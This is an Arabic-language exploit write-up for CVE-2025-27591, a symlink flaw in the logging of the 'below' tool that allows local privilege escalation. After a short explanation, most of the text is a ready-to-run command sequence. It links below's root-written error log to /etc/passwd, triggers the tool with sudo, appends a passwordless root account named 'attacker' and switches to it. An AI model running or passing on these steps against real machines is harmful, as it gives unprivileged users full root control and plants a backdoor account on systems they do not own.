
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2025-27591، عبر إساءة استخدام معالجة الروابط الرمزية غير الآمنة في تسجيل الأداة أدناه لاستبدال ملفات عشوائية بصلاحيات الجذر.
CVE-2025-27591 هي ثغرة تصعيد امتيازات محلية في أداة below (الإصدارات السابقة للإصدار المُصحح) ناتجة عن معالجة غير آمنة للروابط الرمزية داخل آلية تسجيل الأحداث الخاصة بها. يمكن للمهاجمين الذين لديهم وصول محلي استغلال هذه الثغرة لاستبدال ملفات عشوائية بصلاحيات المستخدم الجذر، مما يؤدي إلى تصعيد كامل للامتيازات.
تكتب أداة below ملفات السجل إلى /var/log/below/ دون التحقق بشكل صحيح من الروابط الرمزية. من خلال إنشاء رابط رمزي مسبقًا يشير إلى ملف حساس (مثل /etc/passwd)، يمكن للمهاجم حقن محتوى عشوائي بصلاحيات مرتفعة عند تشغيل العملية الضعيفة تحت sudo.
# تحقق من وجود دليل السجل
test -d /var/log/below && ls -ld /var/log/below
# احذف ملف السجل الموجود وأنشئ رابطًا رمزيًا خبيثًا
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# جهّز إدخال passwd خبيثًا
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# تشغيل السلوك الضعيف باستخدام sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# التبديل إلى المستخدم الجديد بصلاحيات الجذر
su attacker
الاستغلال الناجح يمنح صلاحيات الجذر لمهاجم محلي غير مميز، مما يتيح السيطرة الكاملة على النظام.
/var/log/below/.